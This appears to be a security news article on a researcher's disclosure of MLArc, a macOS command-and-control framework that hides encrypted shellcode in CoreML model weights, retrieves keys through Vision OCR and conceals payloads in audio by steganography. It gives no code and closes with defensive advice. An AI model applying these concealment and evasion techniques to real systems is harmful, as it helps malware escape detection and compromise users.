Security researcher hxr1 has published the second installment of research demonstrating how Apple native AI frameworks can be weaponized for offensive security operations. The research introduces MLArc, a standalone command-and-control framework that operates entirely through Apple AI stack, representing the first public disclosure of Apple AI-assisted payload execution and AI-driven C2 on macOS.

MLArc differs fundamentally from conventional C2 systems that rely on JSON over HTTP, script interpreters, or DLL injection. Instead, it uses AI artifacts as the transport layer, leveraging Apple native frameworks including CoreML for machine learning model execution and Vision for image processing. This approach enables operations that evade traditional detection mechanisms designed for conventional malware patterns.

The research demonstrates embedding encrypted shellcode inside CoreML model weight arrays, where the payload remains hidden within legitimate-appearing AI model files. Vision OCR capabilities are abused as a covert key oracle to unlock encrypted payloads, allowing attackers to conceal encryption keys inside AI-processed images and retrieve them dynamically during execution.

AVFoundation framework exploitation enables hiding and extracting payloads within high-frequency AI-enhanced audio files using steganographic techniques. The combination of these techniques creates a sophisticated evasion capability where malicious activity appears as normal AI framework usage to monitoring tools.

The research underscores growing concerns about AI frameworks becoming vectors for adversarial operations. Security teams should monitor for unusual CoreML and Vision framework usage patterns, implement application allowlisting for AI model files, and consider the AI stack as a potential attack surface requiring dedicated security controls.